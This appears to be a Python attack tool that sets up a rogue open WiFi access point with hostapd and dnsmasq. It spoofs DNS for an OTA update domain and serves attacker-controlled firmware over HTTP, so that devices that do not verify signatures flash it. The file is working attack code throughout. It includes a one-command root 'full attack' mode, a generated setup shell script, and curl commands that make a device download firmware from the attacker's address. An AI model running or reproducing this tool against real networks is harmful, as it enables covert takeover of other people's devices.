#!/usr/bin/env python3
"""
Rogue AP and OTA MITM Setup Tool

Generates hostapd and dnsmasq configuration files to create a rogue WiFi
access point that intercepts OTA firmware update requests. Sets up DNS
spoofing to redirect update.example.com to the attacker's IP and serves
malicious firmware via a built-in HTTP server.

Attack flow:
  1. Rogue AP with matching SSID tricks device into connecting
  2. DNS spoofing redirects update.example.com to attacker IP
  3. HTTP server serves attacker-controlled firmware binary
  4. Device downloads and flashes unsigned firmware without verification
"""

import argparse
import http.server
import os
import shutil
import socketserver
import subprocess
import sys
import textwrap


DEFAULT_SSID = "MyNetwork"
DEFAULT_CHANNEL = 6
DEFAULT_SUBNET = "192.168.4"
DEFAULT_AP_IP = "192.168.4.1"
DEFAULT_DHCP_START = "192.168.4.10"
DEFAULT_DHCP_END = "192.168.4.50"
DEFAULT_OTA_DOMAIN = "update.example.com"
DEFAULT_HTTP_PORT = 80


def generate_hostapd_config(interface, ssid, channel):
    """Generate hostapd configuration for the rogue AP."""
    return textwrap.dedent(f"""\
        # Rogue AP configuration for OTA MITM attack
        # Generated by rogue_ap.py
        interface={interface}
        driver=nl80211
        ssid={ssid}
        hw_mode=g
        channel={channel}
        auth_algs=1
        wpa=0
        # Open network - no encryption (matches CoreS3 default AP config)
        # For WPA2 targets, add:
        #   wpa=2
        #   wpa_passphrase=<target_password>
        #   wpa_key_mgmt=WPA-PSK
        #   rsn_pairwise=CCMP
    """)


def generate_dnsmasq_config(interface, ap_ip, dhcp_start, dhcp_end,
                            ota_domain):
    """Generate dnsmasq configuration for DHCP and DNS spoofing."""
    return textwrap.dedent(f"""\
        # DNS/DHCP configuration for OTA MITM attack
        # Generated by rogue_ap.py
        interface={interface}
        bind-interfaces

        # DHCP server configuration
        dhcp-range={dhcp_start},{dhcp_end},255.255.255.0,24h
        dhcp-option=3,{ap_ip}
        dhcp-option=6,{ap_ip}

        # DNS spoofing - redirect OTA domain to our IP
        address=/{ota_domain}/{ap_ip}

        # Log all DNS queries and DHCP transactions
        log-queries
        log-dhcp

        # Do not read /etc/resolv.conf or /etc/hosts
        no-resolv
        no-hosts

        # Default upstream DNS for everything else
        server=8.8.8.8
    """)


def generate_setup_script(interface, ap_ip, output_dir):
    """Generate a shell script to start the rogue AP."""
    return textwrap.dedent(f"""\
        #!/bin/bash
        # Rogue AP setup script - run as root
        # Generated by rogue_ap.py
        set -e

        IFACE="{interface}"
        AP_IP="{ap_ip}"
        CONF_DIR="{output_dir}"

        echo "[*] Setting up rogue AP on $IFACE..."

        # Kill interfering processes
        echo "[*] Stopping NetworkManager and wpa_supplicant for $IFACE..."
        nmcli device set "$IFACE" managed no 2>/dev/null || true
        killall wpa_supplicant 2>/dev/null || true

        # Configure interface
        echo "[*] Configuring interface $IFACE with IP $AP_IP..."
        ip addr flush dev "$IFACE"
        ip addr add "$AP_IP/24" dev "$IFACE"
        ip link set "$IFACE" up

        # Start hostapd
        echo "[*] Starting hostapd..."
        hostapd "$CONF_DIR/hostapd.conf" &
        HOSTAPD_PID=$!
        sleep 2

        # Start dnsmasq
        echo "[*] Starting dnsmasq..."
        dnsmasq -C "$CONF_DIR/dnsmasq.conf" -d &
        DNSMASQ_PID=$!

        echo "[+] Rogue AP is running."
        echo "[+] SSID will appear in WiFi scans."
        echo "[+] DNS queries for update.example.com will resolve to $AP_IP"
        echo ""
        echo "[*] Start the firmware HTTP server in another terminal:"
        echo "    sudo python3 rogue_ap.py --firmware <path> --start-http"
        echo ""
        echo "[*] Press Ctrl+C to stop..."

        cleanup() {{
            echo ""
            echo "[*] Shutting down..."
            kill $HOSTAPD_PID 2>/dev/null || true
            kill $DNSMASQ_PID 2>/dev/null || true
            ip addr flush dev "$IFACE"
            nmcli device set "$IFACE" managed yes 2>/dev/null || true
            echo "[+] Cleanup complete."
        }}

        trap cleanup EXIT INT TERM
        wait
    """)


def write_configs(output_dir, interface, ssid, channel, ap_ip,
                  dhcp_start, dhcp_end, ota_domain):
    """Write all configuration files to the output directory."""
    os.makedirs(output_dir, exist_ok=True)

    hostapd_conf = os.path.join(output_dir, "hostapd.conf")
    dnsmasq_conf = os.path.join(output_dir, "dnsmasq.conf")
    setup_script = os.path.join(output_dir, "start_rogue_ap.sh")

    with open(hostapd_conf, "w") as f:
        f.write(generate_hostapd_config(interface, ssid, channel))
    print(f"[+] Written: {hostapd_conf}")

    with open(dnsmasq_conf, "w") as f:
        f.write(generate_dnsmasq_config(
            interface, ap_ip, dhcp_start, dhcp_end, ota_domain))
    print(f"[+] Written: {dnsmasq_conf}")

    with open(setup_script, "w") as f:
        f.write(generate_setup_script(interface, ap_ip, output_dir))
    os.chmod(setup_script, 0o755)
    print(f"[+] Written: {setup_script}")

    return hostapd_conf, dnsmasq_conf, setup_script


def start_http_server(firmware_path, port, bind_addr="0.0.0.0"):
    """Start an HTTP server to serve the firmware binary."""
    if not os.path.isfile(firmware_path):
        print(f"[-] Firmware file not found: {firmware_path}", file=sys.stderr)
        sys.exit(1)

    firmware_size = os.path.getsize(firmware_path)
    firmware_name = os.path.basename(firmware_path)

    # Create a temporary directory with firmware.bin
    serve_dir = "/tmp/rogue-ota-server"
    os.makedirs(serve_dir, exist_ok=True)

    dest = os.path.join(serve_dir, "firmware.bin")
    if os.path.abspath(firmware_path) != os.path.abspath(dest):
        shutil.copy2(firmware_path, dest)

    # Also copy with original name
    if firmware_name != "firmware.bin":
        shutil.copy2(firmware_path, os.path.join(serve_dir, firmware_name))

    print(f"[*] Serving firmware: {firmware_path} ({firmware_size:,} bytes)")
    print(f"[*] Available at:")
    print(f"    http://{bind_addr}:{port}/firmware.bin")
    if firmware_name != "firmware.bin":
        print(f"    http://{bind_addr}:{port}/{firmware_name}")
    print()
    print(f"[*] Trigger OTA on device with:")
    print(f"    curl -X POST http://192.168.4.1/ota "
          f"-d 'url=http://{DEFAULT_AP_IP}:{port}/firmware.bin'")
    print()
    print(f"[*] Or let DNS spoofing handle it (device uses default URL):")
    print(f"    curl -X POST http://192.168.4.1/ota")
    print()

    class QuietHandler(http.server.SimpleHTTPRequestHandler):
        def __init__(self, *args, **kwargs):
            super().__init__(*args, directory=serve_dir, **kwargs)

        def log_message(self, format, *log_args):
            print(f"[HTTP] {self.client_address[0]} - "
                  f"{format % log_args}")

    try:
        with socketserver.TCPServer(
            (bind_addr, port), QuietHandler
        ) as httpd:
            httpd.allow_reuse_address = True
            print(f"[+] HTTP server listening on {bind_addr}:{port}")
            print(f"[*] Press Ctrl+C to stop...")
            httpd.serve_forever()
    except PermissionError:
        print(f"[-] Permission denied for port {port}. "
              f"Try: sudo python3 {sys.argv[0]} ...", file=sys.stderr)
        sys.exit(1)
    except OSError as e:
        print(f"[-] Could not bind to port {port}: {e}", file=sys.stderr)
        sys.exit(1)


def start_full_attack(interface, ssid, channel, ap_ip, output_dir,
                      firmware_path, ota_domain):
    """Start the full rogue AP + DNS + HTTP attack chain (requires root)."""
    if os.geteuid() != 0:
        print("[-] This operation requires root privileges.", file=sys.stderr)
        print(f"    sudo python3 {' '.join(sys.argv)}", file=sys.stderr)
        sys.exit(1)

    # Check for required tools
    for tool in ["hostapd", "dnsmasq"]:
        if not shutil.which(tool):
            print(f"[-] Required tool not found: {tool}", file=sys.stderr)
            print(f"    Install with: sudo apt install {tool}", file=sys.stderr)
            sys.exit(1)

    # Write configs
    hostapd_conf, dnsmasq_conf, _ = write_configs(
        output_dir, interface, ssid, channel, ap_ip,
        DEFAULT_DHCP_START, DEFAULT_DHCP_END, ota_domain)

    print()
    print("[*] Starting rogue AP attack chain...")
    print()

    # Configure interface
    print(f"[*] Configuring {interface} with IP {ap_ip}...")
    subprocess.run(["ip", "addr", "flush", "dev", interface], check=False)
    subprocess.run(
        ["ip", "addr", "add", f"{ap_ip}/24", "dev", interface], check=True)
    subprocess.run(["ip", "link", "set", interface, "up"], check=True)

    # Disable NetworkManager for this interface
    subprocess.run(
        ["nmcli", "device", "set", interface, "managed", "no"], check=False)

    procs = []
    try:
        # Start hostapd
        print(f"[*] Starting hostapd with SSID '{ssid}'...")
        hostapd_proc = subprocess.Popen(
            ["hostapd", hostapd_conf],
            stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        procs.append(hostapd_proc)

        import time
        time.sleep(2)

        # Start dnsmasq
        print(f"[*] Starting dnsmasq (DNS spoofing {ota_domain})...")
        dnsmasq_proc = subprocess.Popen(
            ["dnsmasq", "-C", dnsmasq_conf, "-d", "--log-facility=-"],
            stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        procs.append(dnsmasq_proc)

        print()
        print("[+] Rogue AP is running!")
        print(f"    SSID: {ssid}")
        print(f"    IP: {ap_ip}")
        print(f"    DNS spoof: {ota_domain} -> {ap_ip}")
        print()

        if firmware_path:
            print("[*] Starting HTTP firmware server...")
            start_http_server(firmware_path, DEFAULT_HTTP_PORT, ap_ip)
        else:
            print("[*] No firmware specified. Start HTTP server manually:")
            print(f"    python3 -m http.server {DEFAULT_HTTP_PORT}")
            print()
            print("[*] Press Ctrl+C to stop...")
            try:
                hostapd_proc.wait()
            except KeyboardInterrupt:
                pass

    finally:
        print()
        print("[*] Shutting down...")
        for proc in procs:
            proc.terminate()
            proc.wait()
        subprocess.run(["ip", "addr", "flush", "dev", interface], check=False)
        subprocess.run(
            ["nmcli", "device", "set", interface, "managed", "yes"],
            check=False)
        print("[+] Cleanup complete.")


def main():
    parser = argparse.ArgumentParser(
        description="Rogue AP and OTA MITM attack tool. Generates hostapd "
                    "and dnsmasq configs for a rogue WiFi AP that intercepts "
                    "OTA firmware updates via DNS spoofing.",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  %(prog)s --output-dir /tmp/rogue-ap
      Generate config files for rogue AP setup in /tmp/rogue-ap

  %(prog)s --output-dir /tmp/rogue-ap --ssid "HomeWiFi" --interface wlan1
      Generate configs with custom SSID and interface

  %(prog)s --firmware firmware.bin --start-http
      Start HTTP server to serve firmware on port 80

  %(prog)s --interface wlan1 --ssid "MyNetwork" --firmware fw.bin --start
      Start the full attack (hostapd + dnsmasq + HTTP server, requires root)

Attack steps (manual):
  1. Generate configs:  %(prog)s --output-dir /tmp/rogue-ap
  2. Run setup script:  sudo /tmp/rogue-ap/start_rogue_ap.sh
  3. Serve firmware:    sudo %(prog)s --firmware fw.bin --start-http
  4. Trigger OTA:       curl -X POST http://<device>/ota

Prerequisites:
  sudo apt install hostapd dnsmasq
""")
    parser.add_argument(
        "--interface", default="wlan1",
        help="WiFi interface for the rogue AP (default: wlan1)")
    parser.add_argument(
        "--ssid", default=DEFAULT_SSID,
        help=f"SSID for the rogue AP (default: {DEFAULT_SSID})")
    parser.add_argument(
        "--channel", type=int, default=DEFAULT_CHANNEL,
        help=f"WiFi channel (default: {DEFAULT_CHANNEL})")
    parser.add_argument(
        "--firmware", metavar="PATH",
        help="Path to firmware binary to serve via HTTP")
    parser.add_argument(
        "--output-dir", default="/tmp/rogue-ap-config",
        help="Directory to write config files (default: /tmp/rogue-ap-config)")
    parser.add_argument(
        "--ap-ip", default=DEFAULT_AP_IP,
        help=f"IP address for the rogue AP (default: {DEFAULT_AP_IP})")
    parser.add_argument(
        "--ota-domain", default=DEFAULT_OTA_DOMAIN,
        help=f"Domain to spoof for OTA (default: {DEFAULT_OTA_DOMAIN})")
    parser.add_argument(
        "--http-port", type=int, default=DEFAULT_HTTP_PORT,
        help=f"HTTP server port (default: {DEFAULT_HTTP_PORT})")
    parser.add_argument(
        "--start-http", action="store_true",
        help="Start HTTP server to serve firmware (use with --firmware)")
    parser.add_argument(
        "--start", action="store_true",
        help="Start full attack: hostapd + dnsmasq + HTTP (requires root)")

    args = parser.parse_args()

    if args.start:
        start_full_attack(
            args.interface, args.ssid, args.channel, args.ap_ip,
            args.output_dir, args.firmware, args.ota_domain)
    elif args.start_http:
        if not args.firmware:
            print("[-] --start-http requires --firmware <path>",
                  file=sys.stderr)
            sys.exit(1)
        start_http_server(args.firmware, args.http_port)
    else:
        # Generate config files
        write_configs(
            args.output_dir, args.interface, args.ssid, args.channel,
            args.ap_ip, DEFAULT_DHCP_START, DEFAULT_DHCP_END, args.ota_domain)

        print()
        print("[*] Next steps:")
        print(f"    1. Review configs in {args.output_dir}/")
        print(f"    2. Run: sudo {args.output_dir}/start_rogue_ap.sh")
        print(f"    3. Serve firmware: sudo python3 {sys.argv[0]} "
              f"--firmware <path> --start-http")
        print(f"    4. Trigger OTA: curl -X POST http://<device>/ota")

        if args.firmware:
            print()
            print(f"    Or run everything at once:")
            print(f"    sudo python3 {sys.argv[0]} --interface {args.interface} "
                  f"--ssid \"{args.ssid}\" --firmware {args.firmware} --start")


if __name__ == "__main__":
    main()
